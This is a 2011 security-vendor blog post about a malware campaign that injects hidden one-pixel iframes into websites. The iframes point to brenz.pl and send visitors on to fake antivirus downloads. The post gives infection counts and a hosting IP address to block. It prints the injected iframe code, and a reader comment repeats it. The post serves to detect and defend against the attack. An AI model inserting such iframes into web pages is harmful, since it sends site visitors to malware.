• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Brenz.pl is Back With Malicious iFrames

March 5, 2011David Dede

FacebookTwitterSubscribe

We used to see brenz.pl being used to distribute malware back in 2009, and got shut down. However, for the last few weeks we noticed a big increase in the number of sites infected with iframes pointing to it.

All the sites infected have this iframe (or very similar):

<iframe style="height:1px" src="http://www.Brenz.pl/rc/” frameborder=0 wid..

Which redirects the user to another sites to download the unfamous Fake AV. How many sites got infected? According to Google at least 2 thousand sites got hacked in the last 90 days:

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1932 domain(s), including luragung.web.id/, computing.net/, puntlandpost.com/.

And under the same “management”, there is a domain called trenz.pl, which infected more than 1k sites:

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 826 domain(s), including rs.gov.br/, darululoom-deoband.com/, upi.edu/.

Both sites are hosted on 91.188.59.197. So, one more IP address to block in your firewalls 🙂


If your site is currently hacked/infected, contact us to get it cleaned up and secured.

FacebookTwitterSubscribe

Categories: Website Malware InfectionsTags: Malware Updates

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. ope the wize

    May 15, 2013

    pourquoi moi sur mon ordinateur système Windows XP , à chaque fois que j’enregistre un fichier .html, et je le reouvre: je vois marquer sur mon bloc-notes en bas :<iframe style="height:1px" src="http://www.Brenz.pl/rc/&quot; frameborder=0 width=1 ?????mon ordinateur est aussi infecter!!!???et d’abord il n’y a pas de réseau?????

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.